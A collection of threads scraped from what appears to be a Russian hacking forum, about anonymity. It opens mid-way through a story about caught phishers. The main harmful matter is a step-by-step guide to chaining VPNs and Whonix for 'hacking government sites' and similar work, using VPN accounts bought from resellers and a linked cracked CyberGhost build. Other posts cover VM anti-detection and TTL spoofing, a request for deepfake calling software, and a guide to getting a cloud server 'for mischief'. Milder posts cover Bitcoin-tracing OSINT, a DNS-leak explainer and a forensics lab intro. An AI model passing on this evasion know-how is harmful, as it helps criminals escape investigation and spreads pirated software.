Злой майор Доигралес, отслеживал движения валют через фишинг, и по идентификационному номеру, смог отследить, через какой кошелёк, в конечной цепи идут транзакции.
Собрав данные о обменниках, он связался с администраторами и, дав наводку на конкретный адрес, получил данные банковской карты NN-а.

2.Сарафанное радио.
Не следив за языком, он, по старой дружбе, сообщил своему приятелю о себе, с целью пиара его фишинга, через телеграмм канал.
Друг, не скрывая себя, не понимал, что рекламирует мошенническую ссылку, разместил её в канале, где ранее публиковал контент о своей жизни.
От подписчиков начали поступать угрозы с фотографиями написанных заявлений. Спустя день, к админу пришли домой, и слегка надавив, заставили расколоться.
Админ не хотел проблем, и не знал, что подставляет свою аудиторию.

Очень надеюсь, что эту статью прочитали не только состоявшиеся люди в кибер- мире, а дети, чья несформировавшаяся психика и юношеский максимализм, говорят о том, что они умнее всех.
_Поверьте, практически каждый был на вашем месте в своё время. Уважайте старших, набирайтесь опыта, вырабатывайте дисциплину, больше слушайте, а лучше

не лезьте в дела,
за которые вас могут поймать._

Анонимность в сети, один из способов

ID: 676533bbb4103b69df371a52
Thread ID: 85731
Created: 2023-04-12T01:50:06+0000
Last Post: 2023-06-10T13:15:33+0000
Author: mashallowsma
Replies: 29 Views: 2K

Решил написать первую авторскую статью. Статья для параноиков или людей кто занимается чем то серезным.
-----------------------------------------------------------------------------------------------------------------------------------------
Все мы знаем что VPN шифрует трафик защищает данные от перехвата и помогает оставаться анонимным, на самом деле не все так гладко.
Во первых нужно выбрать провайдера который не ведет логи и не записывает трафик, во время разрыва соединения не палит реальный IP , имеет надежное шифрование и не сотрудничает с органами.
К сожалению таких не существует все зависит от ситуаций и обстоятельств кто когда вам сдаст. Поэтому нужно принять меры как максимально защититься и испортить жизнь тем кто будет охотится за нами

Мы будем использовать Android-VPN-USB-modem + 2 VPN шлюза с полной изоляцией и с защитой от утечек + WHONIX + VPN (взломанную версию CyberghostVPN)
--------------------------------------------------------------------------------------
Для этого нам понадобится
-----------------------------------------------------------------------------------
1)Железо с 16гб озу или больше
2)Рутовнный Andrоid с безлимитным интернетом , WIFI адаптер
3)BTC-DASH-MONERO-BTC или другую цепочку но чистый (анонимный) BTC
4)VPN аккаунты, например (Surfshark, PIA, NordVPN)
----------------------------------------------------------------------------------
1.Находим публичный WiFI (кафе,ресторан,метро) заходим в гугл ищем купить VPN аккаунт, есть множество магазинов которые за копейки продают VPN, покупаем 3 VPN аккаунта через BTC

2.На андроиде скачиваем клиент NordVpn и программу VpnHotspot для перенаправление VPN трафика на виртуалку (программа также скрывает от провайдера факт перенаправления трафика)

3.Создаем 2 Виртуалки (Windows 10 LTSC) на VMWare | почему LTSC потому что жрет меньше памяти , легкий и стабильный
В настройках удаляем NAT (Обьязательно), Выбираем 2 свободных адаптера VMnet1 и VMnet 2 (например) и VMnet2 и VMnet 3 (для второй виртуалки)

4.Устанавливаем VPN клиент, например Surfshark | Устанавливаем программу Connectify Hotspot 2018 (в паблике можно найти кряк)
В настройках Connectify Hotspot 2018 перенаправляем трафик Surfshark адаптера на VMnet2 адаптер
-------------------------------------------------------------------------------
Первый шлюз готов
--------------------------------------------------------------------------------
Повторяем все действие для второй виртуалки, но вместе Surfshark выбираем VPN от PIA и вместо перенаправления трафика на адаптер создаем точку доступа с VPN (заранее подключаем WIFI адаптер к второй виртуалке)
--------------------------------------------------------------------------------
Второй шлюз готов (VPN Hotspot)
--------------------------------------------------------------------------------
5.Устанавливаем Whonix Gateway обновляем, проверяем командой whonixcheck
Создаем Виртуалку Windows 10 LTSC (Virtualbox) в котором будем работать | в настройках выбираем частная сеть (whonix) при запуске системы в настройках адаптера пишем IP,Gateway,DNS от whonix | Устанавливаем взломанную версию CyberGhost
-----------------------------------------------------------------------------------------------------------------
И так по подробнее
-----------------------------------------------------------------------------------------------------------------
1.) С левого IP покупаем VPN аккаунты через биткоин (В данном случае VPN провайдеры ничего не знают о нас, потому что мы покупали у посредников)(часто такие аккаунты сбрученные или общие)
2.) На андроиде подключаем NordVpN и через программу VpnHotspot перенаправляем трафик по USB к первому шлюзу (виртулке)-(в данном случае сотовый оператор видит подключение к серверам NordVpn но не узнает что трафик идет к компютеру)
3.) На первом шлюзе подключаемся к SurfsharkVPN и перенаправляем трафик к второму шлюзу (Если вдруг surfshark разорвет соединение трафик не пойдет на второй шлюз )
4.) На втором шлюзе подключаемся к PIAVPN и создаем VPN-WIFI (Опять же если вдруг PIAVPN разорвет соединение трафик не пойдет на ТД)
5.) На основной машине подключаемся к VPN-WIFI от второго шлюза и включаем WhonixGateway (Имея цепочку изолированных VPN соединений подключаемся к TOR )
6.) На Виртуалке Windows 10 LTSC (Virtualbox) открываем CyberGhost и регистрируемся на временную почту, активируем триал , через 24 часа сбрасываем триал и регистрируемся заново (провайдер CyberGhost не имеет представления кто мы и откуда пришли)
7.) Если выбрать подходяшие сервера (ближе вашему региону) и протоколы VPN можно иметь не плохую скорость и пинг.
8.) К дополнению можно купить VPS через BTC и подключится по RDP смотря чем вы занимаетесь | например (автоматизированные атаки, взлом правительских сайтов и тд.) подключился к VPS настроил и вышел
-------------------------------------------------------------------------------------------------------------
Подведем итоги
-------------------------------------------------------------------------------------------------------------
Использование данной схемы дает гарантию что при разрыве соединений реальный IP не будет светится, невозможно деанонить даже если VPN провайдер Cyberghost захочет сдать нас , потому что он тупо не знает о нас ничего, а использование разных VPN провайдеров дает дополнительную защиту.
Короче если за вами не охотится ЦРУ или АНБ то невозможно вас выследить
-------------------------------------------------------------------------------------------------------------

[ CyberGhost.VPN.v8.3.6.9650(madara).rar - AnonFiles

](https://anonfiles.com/1brdH2k4ze/CyberGhost_VPN_v8_3_6_9650_madara_rar)

anonfiles.com

CyberGhost слил с зарубежного форума

Анонимность и Безопасность в Сети ч5 – Анонимность. Браузер

ID: 676533bbb4103b69df371a57
Thread ID: 37298
Created: 2020-05-13T18:27:26+0000
Last Post: 2023-05-27T16:19:28+0000
Author: Benihowy
Prefix: Статья
Replies: 2 Views: 2K

Вот и пришло время поговорить об анонимности. Как только мы подключаемся к интернету, начинается обмен данными с сайтами, торент клиентами и тд. Также присутствует обмен с серверами Майкрософт. В прошлых статьях мы рассмотрели противодействие утечек системы. Их можно свести на ноль. Но как быть с браузерами? Как только мы заходим на сайт, тут же задействуются ява скрипты, которые могут «высосать» всю информацию о браузере, системе, железе.

В чем заключается смысл на сбор этой информации? Ответ довольно прост, государству необходимо контролировать своих граждан, и это невозможно сделать без информации об их предпочтениях. Также в сборе информации имеет место коммерческая составляющая. Предположим, что человек занимается бизнесом, распространяет какой-то товар на улицах, ходит по домам, квартирам. Конечно, у нас это не так популярно, как в странах Европы и Америки. Этот человек имеет сотрудников, которые занимаются распространением. И подводя некий месячный итог, он видит, что дохода почти нету. Ведь процент того, что его товар необходим первому встречному крайне мал. «А вот бы мне знать в каких домах мне будут рады, а в каких нет» - сказал он, и случилось чудо. Оказывается, есть такие данные. Как они могут быть? Ведь законодательство таких стран запрещает слежку за своими гражданами. Но существует лазейки. 5,9,14 глаз – это проекты, в которых государства шпионят друг за другом, а затем делятся этой информацией.

Миллиарды долларов тратят агентства «состоящие из трех букв». Конкретный пример, что это затрагивает лично вас - правительство могут прослушивать ваши мобильные спутниковые и аналоговые телефоны, могут использовать голосовое распознавание при сканировании мобильных сетей, читать ваши электронные письма и текстовые сообщения, цензурировать веб сайты, отслеживать перемещение людей при помощи GPS мобильных телефонов, подменить содержимое @mail’a на лету, включать веб камеры встроенные в компьютеры, включать микрофоны в телефонах даже если они выключены и вся эта информация систематизируется и фильтруется на таком масштабном уровне. Что может быть использована для шпионажа за каждым человеком в целой стране и за ее пределами. Хранение таких объёмов информации требует специальных сооружений.
Дата центр АНБ расположен в штате Юта рядом с тренировочным центром Национальной гвардии США Кэмп Уильямс неподалеку от городка Блаффдейл между озером Юта и Большим Солёным озером

Он является одним из крупнейших в мире, который был построен для хранения огромных массивов информации. Площадь основных зданий 100-150 тис. м^2. Стоимость его возведений составляет 1.5-2 млрд. долларов. Энергопотребление составляет 65 МВт, стоимость которых 40млн\год. Емкость носителей информации оценивается 3-12 ЕБ (экзабайт; 1 ЕБ = 1 000 000 ГБ). А известное заявление гласит, что все слова, которые когда-либо были сказаны человеком могут вместится, примерно, в 5 ЕБ. Этот дата центр может обрабатывать все виды коммуникаций, включая полное содержание приватных эл. писем, мобильные телефоны, истории поиска в интернете, а также все виды отслеживания персональных данных (талоны на парковку, маршруты перемещения и многие другие цифровые отпечатки). Получается, что необходимо принять тот факт, что все коммуникации находятся под активной слежкой и она включает в себя все ваши действия в интернете.

Как же быть тогда? Выходит, что анонимности нет. С одной стороны, это так. Предположим, что интернет — это вспаханное поле. И как бы мы не старались пройти его, все равно оставим следы. Поэтому суть заключается в подмене этих следов. Для каждого браузера есть уникальный отпечаток. Что-то наподобие отпечатка пальцев человека. Отпечаток браузера – это совокупность многих параметров браузера и системы. Разрешение экрана, локальное время и часовой пояс, канвас, шрифты, параметры сглаживания, кукисы, установленные кодеки, ОС и разрядность, плагины и это только основные.

**Я для себя определил два метода анонимности:

Скрываться на виду**. Смысл состоит в выдачи себя за типичного юзера интернета. Для этого не нужно иметь специальные плагины для браузера. Нужно иметь самый популярный браузер, настроен по умолчанию (Хром), и операционную систему – Windows 10. Запускается это все на правильно настроенной виртуальной машине. Нужно придать ВМ личность реальной машины, это нужно для браузера, который по факту знает в какой ОС и на каком железе запускается. Можно было поговорить про «антидетект машину» Vector T13, кто следит за сборками вектора тот поймет, что я имею ввиду. Смысл прост, заменить любое упоминание виртуального железа на реальное, путем модификации файлов гипервизора и биоса ВМ (в качестве гипервизора используется virtualbox).
Если это невозможно сделать, то необходимо придать как можно больше черт реальной машины, объём ОЗУ, объём диска, расширение монитора. Нужно сделать так, чтобы даже сам windows думал, что запускается на реальном железе (ведь в диспетчере задач отчетливо написано)

Рассмотрим прием для vmware. Нужно вписать две строки в конфигурационный файл(.vmx) виртуальной машины
vhv.enable = "TRUE"
hypervisor.cpuid.v0 = "FALSE"
и «форсируем» поддержку VT-x / AMD-V

После загрузки в диспетчере включена поддержка виртуализации, даже можно создавать виртуальные машины внутри самой виртуальной машины

Не устанавливаем гостевые дополнения от vmware. Если настройка закончена, делаем снапшот состояния. Копируем браузер каждый раз после снапшота и распаковываем (portable версия). Запускать браузер следует без прав администратора. Менять айпи адрес следует через vpn (можно использовать vpn- tor-vpn или выдавать vpn трафик за dns или обфусцированый vpn). Айпи должен совпадать с часовым поясом (не хорошо, если у вас американский айпи, а время стоит московское и раскладка ru). Трафик нужно насыщать торентами и генерировать браузерами. Провайдер должен видеть ваш трафик, как будто вам нечего скрывать. Это делается для того, чтобы трафик той виртуальной машины затерялся среди прочего; и среди мусора сложно определить какой трафик важен для вас. Эту ВМ нужно включать только тогда, когда это необходимо (написать сообщение на каком-то форуме, не нужно заходить каждый раз, чтобы читать сообщения других юзеров, это можно сделать и с другой машины). От ценности передаваемой информации в интернет стоит прибегнуть к скрытой ОС путем veracrypt и услугам дедика, и сразу же стоит подумать, о правдоподобном оправдании - «у меня точка доступа без пароля... или меня взломали..., вот все мои ключи шифрования. По окончании работы делаем снапшот.

Передавать как можно меньше информации о себе. В дополнение к первому методу; в идеале оставить о себе только айпи адрес. Для этих целей лучше всего подойдет браузер firefox. Плагины для этого:
- stylish
- Noscript

- Random agent spoofer имеет очень много настроек

- umatrix является файерволом для браузера

- cookie monster

- requestpolicy

И что мы имеем в итоге?

Казалось бы, все, но есть также такие понятия как мак адрес и ttl (количество хопов). Их тоже нужно изменить. Мак поменять не сложно, достаточно использовать программу smac

для смены ttl потребуется реестр.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:00000063
Значение тут шестнадцатеричное. Для виндовса обычно ttl составляет 128, его следует изменить в пределах примерно 125-130.

ExpressVPN, обсуждение

ID: 676533bbb4103b69df371a5e
Thread ID: 82109
Created: 2023-02-16T11:25:12+0000
Last Post: 2023-05-15T20:54:10+0000
Author: Amsterdam
Replies: 30 Views: 2K

Why you should not use it.

First of all, thanks for taking time and reading this article, it took me about 3 hours to compile the data, create the graph and write everything up to be shared here.

Who owns all of these companies?

Kape Technologies officially acquired PIA, ExpressVPN, CyberGhost VPN, Ajillion LLC, Definiti Media, Reimage, DriverAgent, Itego, Zenmate and Webselenese from the span of May 12, 2014 to Sep 13, 2021.

Details:

Ajillion LLC - May 12, 2014 - No named price
Definiti Media - May 18, 2014 - $15M
Reimage - Jun 1, 2014 - No named price
DriverAgent - Oct 24, 2016 - $1M
CyberGhost - Mar 14, 2017 - €9.1M
Intego - Jul 24, 2018 - $16M
ZenMate - Oct 16, 2018 - €4.8M
Private Internet Access - Nov 19, 2019 - $95M
Webselenese - Mar 8, 2021 - $149.1M
ExpressVPN - Sep 13, 2021 - $936M

Kape Technologies

The company used to be called Crossrider and specialized in SDK's for deployment in browser extensions that used a variety of platforms to monetize these extensions. The scummy practices those monetization tools would make use of included: Ad-injectors which would use a method called man-in-the-browser (MITB) to change or add advertisements to whatever the user saw. After becoming more popular they started being used in malware and adware, unable to fight abuse the company gained very bad reputation and subsequently changed fields.

They changed their name in March of 2018 to Kape technologies due to new management.

The questions and concerns

They own 3 mayor VPN services (CyberGhost VPN, ExpressVPN, Private Internet Access), used to make commercially viable monetization SDK's with, at best scummy practices and at worst outright malicious intentions AND own a VPN review platform (Webselenese). This questions their confidentiality and credibility when disclosing information to the public. I have personally not investigated any allegations against the platform and what I am listing here is information I have raised while researching the company and its connections to shady businesses.

At the end of the day, it is still completely on you if you decide to use them, though I would highly discourage from doing so as they have a shady past.

Замена лица, голоса (DeepFake, Face/Voice swap), ПО, обсуждение.

ID: 676533bbb4103b69df371a67
Thread ID: 73568
Created: 2022-09-24T09:39:48+0000
Last Post: 2023-05-01T07:43:54+0000
Author: obtim
Replies: 19 Views: 2K

В отдельных ТГ каналах предлагают купить ПО для звонков с подменой лица. Подскажите, где взять готовые решения for free?

Анонимность, безопасность Bitcoin (is it traceable)

ID: 676533bbb4103b69df371a68
Thread ID: 82729
Created: 2023-02-25T23:45:02+0000
Last Post: 2023-05-01T06:24:48+0000
Author: BADREDDINE
Replies: 26 Views: 2K

[![](/proxy.php?image=https%3A%2F%2Fwallpapersmug.com%2Fdownload%2F3840x2160%2F40d771%2Fcrypto- currency-abstract- bitcoin.jpg&hash=794eaf2308c231cd63df8aa8dbad165c)](https://wallpapersmug.com/download/3840x2160/40d771/crypto- currency-abstract-bitcoin.jpg)

Hackers and criminals, who often operate in hidden areas of the World Wide Web, resort to the encrypted digital currency "Bitcoin" to carry out illegal actions, without revealing their names or addresses.

Welcome back.

For Anyone Bitcoin In this tutorial, I'm going to show you some basic tools for tracking Bitcoin transactions

Blockchain.com

Blockchain.com is a website that tracks transactions on the blockchain for Bitcoin, Ethereum, and Bitcoin Cash. For example, here we entered the wallet address involved in a recent scam we investigated and we can see that this address was involved in 241 transactions totaling nearly $500,000.

We can scroll down the screen and see every transaction that includes this address.

Bitref.com website

Bitref.com allows us to check the balance in any Bitcoin wallet. By entering the same address above, we can see that the wallet has only 0,00000546 bitcoins. Bitref also lists the last 100 transactions in that wallet.

Who is he

Bitcoinwhoswho.com is particularly valuable for fraud investigations. This site provides not only the current balance and the number of transactions, but also whether the address appeared on any websites and the IP address of the last transaction.

Note here that our wallet address does not appear on any websites, but the last IP address does. We can then take that IP address and put it into one of the many IP address lookup engines like IPaddresslookup.com and it will tell us the location and ISP of the IP address.

Here we can see that the last transaction from this wallet came from Norfolk, VA in the US which was using Verizon as its ISP.

Wallet Explorer

Wallet Explorer is another useful website for tracking bitcoin and other cryptocurrency transactions. What makes Wallet Explorer particularly useful is the algorithm for identifying wallet addresses and names. Note that our wallet address here has had at least one transaction with Binance.com.

oxt.me

oxt.me is another website for tracking bitcoin transactions on the blockchain. When we enter our wallet address in oxt.me, it shows basic information about its use.

When we click on the Activity tab, we can see all transactions over time. Note here that the incoming and outgoing transactions are almost identical in time and amount. This is a key signature of a wallet that is being used for illegal purposes. The perpetrators immediately send the bitcoin to another wallet upon receiving it making it difficult to trace and recover it.

Bitcoinabuse.com

**Bitcoinabuse.com specializes in tracking abusive behavior using bitcoin. This includes investing and exchanges in fake cryptocurrency, theft, ransomware, and more. When we entered our wallet address, you can see that it has been cited for investment scams.

summary

These OSINT tools can help you track activity and lead you to the identity of the scammers/thieves. You will likely need additional tools described on the OSINT page to locate scammers/thieves. Once the culprits are identified, the next step is recovery.

ProtonVPN, Обсуждение

ID: 676533bbb4103b69df371a7b
Thread ID: 81112
Created: 2023-02-02T11:24:34+0000
Last Post: 2023-04-04T14:59:38+0000
Author: diniila
Replies: 39 Views: 2K

Hi, i have protonvpn and I was wondering if this vpn is anonymous because we can notice that it has servers that seem to be offshore. Thanks in advance.

Бесплатно получаем дедик от «SberCloud»

ID: 676533bbb4103b69df371a7d
Thread ID: 69959
Created: 2022-07-11T16:37:25+0000
Last Post: 2023-04-04T13:10:08+0000
Author: Amnezzua
Prefix: Статья
Replies: 12 Views: 2K

Нашел** отличную возможность получить собственный выделенный сервер для всевозможных шалостей.**

_1. Переходим по ссылке (https://sbercloud.ru/ru) и регистрируем аккаунт;
2. Теперь нам необходимо активировать платформу «Advanced». Нажимаем на вкладку «Создание виртуального сервера» (

https://imgur.com/wMSCegU

3. Переходим в вкладку «Advanced», затем в разделе «Computing» нажимаем на «Elastic Cloud Server» (

https://imgur.com/tCc5Huc

4. Нажимаем «Create ECS» (

https://imgur.com/SxCxTL3

5. Ставим галочки, как позкано на скриншотах (скришот 4 (

https://imgur.com/QPGl4Bx

), скриншот 5 (

https://imgur.com/rSfALGa

), скриншот 6 (

https://imgur.com/Kz1fhUX

6. Поздравляю, мы только что создали сервер? Теперь осталось только в него войти;
└ По умолчанию в «Linux» будет имя пользователя «root» и пароль, который мы указали ранее. В «Windows» же имя пользователя «Administrator»;
7. PROFIT!_

Обычно дедик живет примерно 4-5 дней, наслажайтесь

Утечка DNS при использовании SOCKS прокси

ID: 676533bbb4103b69df371a8f
Thread ID: 78222
Created: 2022-12-15T20:58:47+0000
Last Post: 2022-12-21T09:28:48+0000
Author: Maxik2005
Prefix: Статья
Replies: 13 Views: 2K

Утечка DNS при использовании SOCKS прокси и методы, позволяющие её предотвратить.

Привет, XSS.is!

Прежде чем начать, поговорим о том, как вообще работает DNS.

Как вы понимаете, нельзя просто так взять и обратиться к сетевому хосту по имени example.com , потому что протоколом IP, на котором базируется интернет, для обращения к сетевым хостам предусмотрена числовая адресация. Примером такого адреса может быть хорошо известный читателям IPv4 адрес, который имеет вид 1.2.3.4

Приведу аналогию. Вы не можете набрать в таксофоне имя и фамилию своего друга и таким образом дозвониться до него, потому что ваша телефонная служба использует не буквенные имена, а состоящие из цифр номера телефонов, что обусловлено архитектурой телефонной сети.
Однако нам, людям, было не очень удобно запоминать цифры и держать в голове десятки номеров, поэтому мы придумали телефонные справочники.

DNS сервер представляет собой оператора, у которого есть такой телефонный справочник. Таким образом вам совсем не обязательно иметь свой справочник, ведь достаточно помнить один номер - номер телефона оператора. Вы позвоните оператору, назовёте ему имя своего друга и в ответ получите номер телефона, по которому сможете дозвониться.

Если DNS сервер чего-то не знает, он обращается к следующему DNS серверу, и так вплоть до корневых DNS серверов - справочников колоссального размера - являющихся китами, на которых стоит наш интернет.

Конечно, это очень упрощённое объяснение. Разумеется, DNS протокол намного сложнее и поддерживает различные виды записей, в том числе произвольные текстовые записи, которые могут содержать, например, вашу цифровую подпись. Всё это выходит далеко за рамки статьи, однако на случай, если кто-то захочет погрузиться в эту тему с головой, рекомендую начать с бесплатной книги Domain Name Sanity авторства Edward Loveall.

Как это работает на уровне программ.
На более высоком уровне, например, в скриптовых языках программирования, возможно вы встречали что-то подобное:

Code:Copy to clipboard

response = http.get("https://example.com/");

Однако это - всего лишь удобная обёртка. На более низком уровне - на уровне операционной системы и её библиотек - данная операция будет примерно соответствовать следующему псевдокоду:

Code:Copy to clipboard

remote_ip = getaddrbyname("example.com");
remote_port = 443;
conn = tcp_connect(remote_ip, remote_port);
if (!conn) { /* ... */ }
write(conn, bytes, len);
/* ... */
close(conn);

Конечно, здесь мы упустили получение HTTP ответа и различные сценарии, связанные с обработкой ошибок, но в данном контексте нам они совершенно не важны. Нам важно рассмотреть функцию getaddrbyname. Вызов именно этой функции направлен на то, чтобы заставить операционную систему обратиться к DNS серверу и предоставить нам IP адрес, соответствующий имени example.com.

Операционная система, в свою очередь, обратится к указанному в её настройках DNS серверу, который чаще всего соответствует адресу вашего маршрутизатора либо корпоративного сервера DNS. Но так как вашему DNS мало что известно о внешнем мире, как уже было сказано ранее, он будет вынужден обратиться к следующему DNS серверу, который скорее всего будет иметь отношение к вашему интернет-провайдеру. И так далее по цепочке.

Подавляющее большинство программ устроены именно так, как было показано выше. Однако для справки отметим, что отдельно взятая программа может напрямую обратиться к любому доступному DNS серверу, минуя все настройки вашей операционной системы. Конечно же, такое поведение можно ограничить на уровне фаерволла, и даже возможно обмануть подобную программу, но мы не будем этого делать, потому что это выходит за пределы обсуждаемой темы.

Проблема.
Предположим, что есть некий веб сайт example.com.
Вы планируете войти этот сайт, используя socks proxy с IP адресом 12.34.56.78
При этом на стороне сервера example.com применяется следующая манипуляция: сервер запоминает ваш IP адрес и соответствующее ему сгенерированное уникальное значение, например, abcdefg12345 , и внедряет в HTML страницу следующий HTML код:

Code:Copy to clipboard

<img src="https://abcdefg12345.fraudcheck.example.com/">

Ваш браузер попытается загрузить содержимое с домена abcdefg12345.fraudcheck.example.com , и для этого, в первую очередь, браузеру нужно будет узнать IP адрес данного сетевого хоста. Браузер обратится к вашему DNS серверу, а тот, как было сказано ранее, обращается к следующим в цепочке DNS серверам. И вся хитрость состоит в том, что следующий после вашего провайдера DNS является сервером, подконтрольным владельцу example.com. Таким образом, веб сайт сможет определить не только ваш IP адрес, но и адрес вашего DNS сервера. Происходит утечка DNS.

Если ваш прокси сервер имеет IP адрес из Нью-Йорка, а DNS сервер принадлежит провайдеру МедиаЛан из Костромы, вывод напрашивается сам собой.
К тому же, даже в случае менее явного несовпадения, сервис example.com сможет произвести проверку принадлежности IP вашего DNS сервера к сети Tor, или же поискать этот IP в списке известных публичных DNS серверов.

Почему так происходит.
Начнём с того, что DNS в большинстве случаев работает по протоколу UDP, и не все соксификаторы поддерживают проксирование UDP через socks версии 5, которая позволяет это делать. Но не это главное.
Когда мы рассматривали принцип работы DNS, я объяснил, что адрес вашего DNS сервера обычно соответствует вашему маршрутизатору или корпоративному DNS. То есть ваш DNS сервер находится в вашей локальной сети. Чтобы избежать утечки DNS, адрес локального DNS сервера нужно заменить на какой-то другой.
Возникает вопрос, а к какому DNS серверу проксировать трафик? Этот вопрос является одним из ключевых и мы вернёмся к нему немного позднее.

А пока что мы рассмотрим понятие Remote DNS.

Как работает socks-remote-dns в Firefox.
К великому счастью, протокол socks, начиная с версии 4а поддерживает адресацию в виде доменных имён, поэтому вся рутина, связанная с ресолвингом DNS, может происходить на стороне прокси сервера.
Иными словами, теперь таксофоном пользуетесь не вы, а ваш приятель, и находится он не в Костроме, а в Нью-Йорке. Вы звоните приятелю и просите соединить вас с вашим другом, при этом для вас уже совершенно не имеет значения, как именно он это сделает и какому нью-йоркскому оператору он будет звонить, чтобы получить данные из телефонного справочника.
Возвращаясь к нашему псевдокоду, выглядит это примерно так

Code:Copy to clipboard

hostname = "example.com";
if (socks_remote_dns) {
  req.dst.addr = hostname;
  req.atyp = 0x3; /* address type is HOSTNAME */
else {
  req.dst.addr = getaddrbyname(hostname);
  req.atyp = 0x1; /* address type is IP V4 */
}
/* ... */
send(socks, req, len);

Но есть загвоздка. В некоторых браузерах, например в chromium и его производных, включить remote DNS несколько сложнее, чем в Firefox, а большинство программ вообще не поддерживают remote DNS. Конечно, средствами операционной системы можно принудительно соксифицировать сетевой трафик, за счет правил фаерволла, роутинга либо перехвата сетевых функций, но этим не решить проблему отсутствия поддержки remote DNS.

И теперь мы закономерно возвращаемся к нашему вопросу о выборе DNS сервера, который будет использоваться в таких случаях.

**Рассмотрим возможные решения.

Public DNS**
Можно скрыть свой DNS, настроив операционную систему на использование какого- то публичного DNS сервера, например, 8.8.8.8
Очевидный минус, что как только сервис example.com обнаружит, что у вас есть возможность менять IP адреса, настанет время вычислить какой-то другой статичный параметр, по которому можно будет выявить вашу активность. Этим параметром будет ваш публичный DNS сервер.
Также вам вряд ли понравится, что публичный DNS сервер видит ваш IP адрес за соксом. Следовательно, вам нужно позаботиться и о том, чтобы ваш IP был скрыт. Для этого вам нужен или локальный DNS сервер, который одновременно будет являться сокс клиентом, или, как альтернатива, публичный DNS сервер с поддержкой DNS over HTTP.

dns-tcp-socks-proxy
Это именно то, о чём мы говорили выше. Данный инструмент представляет собой простейший DNS сервер, который работает через сокс прокси.
Все ваши DNS запросы будут перенаправляться через сокс прокси на случайный публичный DNS из списка. По умолчанию данный список содержит 40 публичных DNS серверов.
С одной стороны, вы решите проблему смены DNS и даже скроете свой IP адрес.
С другой стороны, обнаружить вашу активность станет ещё легче. Вспомним наш пример с внедрением HTML кода на страницу:

Code:Copy to clipboard

<img src="https://abcdefg12345.dns.fraudcheck.example.com/">
<img src="https://hijklmn67890.dns.fraudcheck.example.com/">

Как вы понимаете, даже данный примитивный пример наверняка с первой же попытки позволит узнать, что
а) вы используете рандомный DNS сервер,
б) ваш DNS сервер входит в список публичных DNS серверов.

Tor
Пакет tor имеет свой собственный DNS сервер, который позволяет вам отправлять DNS запросы через сеть Tor.
Однако вы должны понимать, что вряд ли легитимные пользователи сервиса example.com используют Tor DNS. Таким образом будет очень легко вычислить вашу активность на веб сайте сервиса.

Fake IP
Это мой любимый метод. Примерно такая реализация используется в программе Proxifier.
Достаточно надёжное решение, которое может быть реализовано в любой операционной системе.
Суть заключается в том, чтобы запустить свой собственный локальный DNS сервер, который присваивает каждому домену локальный фейковый IP адрес вида 127.8.x.x , например, 127.8.123.45.
Таким образом сокс клиенту достаточно всего лишь отслеживать трафик, маркированный подменённым IP, и выполнять обратную замену фейкового IP на доменное имя, чтобы ресолвинг происходил уже на стороне сокс сервера, как это происходит при использовании remote DNS.
Минус здесь только в том, что поскольку мы не знаем настоящий IP, мы не можем применять к нему какие-либо правила, потому что ваш прокси клиент будет думать, что example.com имеет IP адрес 127.8.123.45.
Также если говорить о работе приложения, которое находится под контролем противодействующей вам стороны, в нашем примере сервиса example.com , ничто не мешает приложению выявлять факт использования проксифаера, просто сравнивая ответ DNS сервера с ожидаемым либо проверяя, не содержит ли ответ такой локальный фейковый IP.

Code:Copy to clipboard

remote_ip = getaddrbyname("example.com");
if (is_local_ip(remote_ip)) {
    fraudscore += 10;
}

Разумеется, такую защиту возможно победить, но решение находится далеко за пределами обсуждаемой темы.

В конечном счете можно прийти к выводу, что универсального решения, которое бы смогло покрыть все 100% возможных сценариев, на стороне пользователя просто не существует.

Пожалуй, идеальным решением было бы предоставить пользователям возможность выполнять DNS запросы, минуя все эти костыли.

Возможно, настало время задаться теоретическим вопросом, а почему бы сокс клиенту просто не обращаться напрямую к тому же DNS, к которому обращается сокс сервер при активации remote DNS?
Теоретически это возможно, однако для этого необходимо решить следующие практические задачи:
Во-первых, мы не знаем адрес DNS, который используется сокс сервером.
Во-вторых, как уже было сказано, DNS чаще всего находится во внутренней сети, и в большинстве случаев сокс сервер будет настроен так, чтобы не позволить вам обращаться к своей внутренней сети в нарушение всех политик безопасности. И к тому же никто не сможет вам гарантировать, что вы не столкнётесь с конфликтом из-за одниковой адресации в вашей локальной сети и в локальной сети сокс сервера.
В-третьих, вам нужно, чтобы все используемые сокс серверы позволяли вам реализовать данный метод.
Как мы видим, справиться со всем этим возможно только на уровне какого-то частного решения. Владелец такого решения должен озаботиться, чтобы на всех сокс серверах был выделен локальный адрес, который не блокируется соксом и не конфликтует с сетями пользователей. И тогда вам лишь останется обзавестись локальным DNS сервером, который будет обрабатывать все ваши DNS запросы соответствующим образом.

В заключение - А что по поводу VPN?
Разумеется всё что касается утечки DNS справедливо и для VPN. Однако в отличии от SOCKS протокола, VPN позволяет вам осуществлять то что мы называем remote DNS вообще без каких-либо ограничений. Даже если DNS находится во внутренней сети сервера. Потому как VPN как раз и предназначен для предоставления доступа ко внутренним сетям. Также с VPN вы без труда сможете скрыть свой IP от используемого вами публичного DNS сервера. И конечно же ваш конфиг не будет зависеть от того какой протокол используется DNS сервером (UDP или TCP).

Полезные ссылки.
- DNS Socks Proxy: https://github.com/jtRIPper/dns-tcp-socks-proxy
- Список публичных DNS с выборкой по странам: https://public-dns.info/
- Proxifier: https://www.proxifier.com/
- Remote DNS в Chromium: <https://www.chromium.org/developers/design- documents/network-stack/socks-proxy/>
- Описание протокола SOCKS Version 5: <https://www.rfc- editor.org/rfc/rfc1928.html>

**Специально для XSS.is.

Поддержать автора и выход новых статей:**

Spoiler

bc1q0uhlcf9yyrgm0xyfgxlzgylfu0avd6pwgtd5t7

Уроки форензики. Расследуем заражение машины с Windows шпионским трояном

ID: 676533bbb4103b69df371aa9
Thread ID: 74304
Created: 2022-10-13T20:32:33+0000
Last Post: 2022-10-13T20:32:33+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 2K

В этой статье я покажу, как извлекать основные артефакты из образов оперативной памяти Windows. Мы восстановим процесс атаки, чтобы расследовать инцидент. В этом нам поможет лабораторная работа TeamSpy с ресурса CyberDefenders.

По сценарию сотрудник компании сообщил, что получил подозрительное электронное письмо с файлом документа и после этого компьютер начал вести себя странно. Группа реагирования на инциденты сделала несколько дампов памяти с подозрительных машин. Наша задача — расследовать инцидент и разобраться, что произошло.

